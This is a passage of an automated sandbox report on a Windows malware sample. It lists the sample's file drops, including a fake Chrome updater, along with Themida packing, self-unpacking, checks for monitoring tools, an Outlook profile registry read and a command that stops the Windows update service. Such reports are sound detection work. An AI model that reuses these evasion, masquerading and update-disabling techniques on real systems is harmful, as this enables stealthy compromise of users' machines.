Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: dpx.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\ProgramData\Google\Chrome\updater.exe	Section loaded: apphelp.dll

Source: C:\Users\user\Desktop\b4s45TboUL.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\b4s45TboUL.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: C:\Users\user\Desktop\b4s45TboUL.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: my_library.pdbU source: b4s45TboUL.exe, 00000000.00000002.2106640783.000000006D001000.00000002.00000001.01000000.00000007.sdmp, b4s45TboUL.exe, 00000000.00000002.2091301864.0000000002490000.00000040.00001000.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000003.1686239349.0000000002570000.00000004.00001000.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp
Source:	Binary string: my_library.pdb source: b4s45TboUL.exe, b4s45TboUL.exe, 00000000.00000002.2106640783.000000006D001000.00000002.00000001.01000000.00000007.sdmp, b4s45TboUL.exe, 00000000.00000002.2091301864.0000000002490000.00000040.00001000.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000003.1686239349.0000000002570000.00000004.00001000.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: HIIDGCGCBF.exe, 00000004.00000002.1986378243.00007FF68D548000.00000040.00000001.01000000.00000008.sdmp, updater.exe, 0000002A.00000002.2010831986.00007FF7586B8000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: HIIDGCGCBF.exe, 00000004.00000002.1986378243.00007FF68D548000.00000040.00000001.01000000.00000008.sdmp, updater.exe, 0000002A.00000002.2010831986.00007FF7586B8000.00000040.00000001.01000000.0000000A.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\b4s45TboUL.exe

Unpacked PE file: 0.2.b4s45TboUL.exe.400000.1.unpack .text:ER;.data:W;.tehu:W;.rsrc:R;.reloc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\b4s45TboUL.exe

Unpacked PE file: 0.2.b4s45TboUL.exe.400000.1.unpack

Source: C:\Users\user\Desktop\b4s45TboUL.exe

Code function: 0_2_0040A090 LoadLibraryA,GetProcAddress,GetProcAddress,FreeLibrary,

0_2_0040A090

Source: initial sample

Static PE information: section where entry point is pointing to: .boot

Source: b4s45TboUL.exe	Static PE information: section name: .tehu
Source: HIIDGCGCBF.exe.0.dr	Static PE information: section name:
Source: HIIDGCGCBF.exe.0.dr	Static PE information: section name:
Source: HIIDGCGCBF.exe.0.dr	Static PE information: section name:
Source: HIIDGCGCBF.exe.0.dr	Static PE information: section name:
Source: HIIDGCGCBF.exe.0.dr	Static PE information: section name:
Source: HIIDGCGCBF.exe.0.dr	Static PE information: section name:
Source: HIIDGCGCBF.exe.0.dr	Static PE information: section name:
Source: HIIDGCGCBF.exe.0.dr	Static PE information: section name:
Source: HIIDGCGCBF.exe.0.dr	Static PE information: section name: .imports
Source: HIIDGCGCBF.exe.0.dr	Static PE information: section name: .themida
Source: HIIDGCGCBF.exe.0.dr	Static PE information: section name: .boot
Source: chrome_131[1].exe.0.dr	Static PE information: section name:
Source: chrome_131[1].exe.0.dr	Static PE information: section name:
Source: chrome_131[1].exe.0.dr	Static PE information: section name:
Source: chrome_131[1].exe.0.dr	Static PE information: section name:
Source: chrome_131[1].exe.0.dr	Static PE information: section name:
Source: chrome_131[1].exe.0.dr	Static PE information: section name:
Source: chrome_131[1].exe.0.dr	Static PE information: section name:
Source: chrome_131[1].exe.0.dr	Static PE information: section name:
Source: chrome_131[1].exe.0.dr	Static PE information: section name: .imports
Source: chrome_131[1].exe.0.dr	Static PE information: section name: .themida
Source: chrome_131[1].exe.0.dr	Static PE information: section name: .boot
Source: updater.exe.4.dr	Static PE information: section name:
Source: updater.exe.4.dr	Static PE information: section name:
Source: updater.exe.4.dr	Static PE information: section name:
Source: updater.exe.4.dr	Static PE information: section name:
Source: updater.exe.4.dr	Static PE information: section name:
Source: updater.exe.4.dr	Static PE information: section name:
Source: updater.exe.4.dr	Static PE information: section name:
Source: updater.exe.4.dr	Static PE information: section name:
Source: updater.exe.4.dr	Static PE information: section name: .imports
Source: updater.exe.4.dr	Static PE information: section name: .themida
Source: updater.exe.4.dr	Static PE information: section name: .boot

Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_0042A378 push eax; retf	0_2_0042A39D
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_0041B335 push ecx; ret	0_2_0041B348
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFFDE51 push ecx; ret	0_2_6CFFDE64
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61EDA2A8 push ds; retf	0_2_61EDA2AE

Source: b4s45TboUL.exe	Static PE information: section name: .text entropy: 7.619569999320736
Source: HIIDGCGCBF.exe.0.dr	Static PE information: section name: entropy: 7.963078355074916
Source: chrome_131[1].exe.0.dr	Static PE information: section name: entropy: 7.963078355074916
Source: updater.exe.4.dr	Static PE information: section name: entropy: 7.963078355074916

Source: C:\ProgramData\HIIDGCGCBF.exe	File created: C:\ProgramData\Google\Chrome\updater.exe	Jump to dropped file
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File created: C:\ProgramData\chrome.dll	Jump to dropped file
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\chrome_131[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File created: C:\ProgramData\HIIDGCGCBF.exe	Jump to dropped file

Source: C:\ProgramData\HIIDGCGCBF.exe	File created: C:\ProgramData\Google\Chrome\updater.exe	Jump to dropped file
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File created: C:\ProgramData\chrome.dll	Jump to dropped file
Source: C:\Users\user\Desktop\b4s45TboUL.exe	File created: C:\ProgramData\HIIDGCGCBF.exe	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\ProgramData\HIIDGCGCBF.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\ProgramData\HIIDGCGCBF.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\ProgramData\HIIDGCGCBF.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\ProgramData\HIIDGCGCBF.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\ProgramData\HIIDGCGCBF.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\ProgramData\HIIDGCGCBF.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\ProgramData\Google\Chrome\updater.exe	Window searched: window name: FilemonClass
Source: C:\ProgramData\Google\Chrome\updater.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\ProgramData\Google\Chrome\updater.exe	Window searched: window name: RegmonClass

Source: C:\ProgramData\HIIDGCGCBF.exe

Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\b4s45TboUL.exe

Code function: 0_2_00419F20 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00419F20

Source: C:\Users\user\Desktop\b4s45TboUL.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\b4s45TboUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
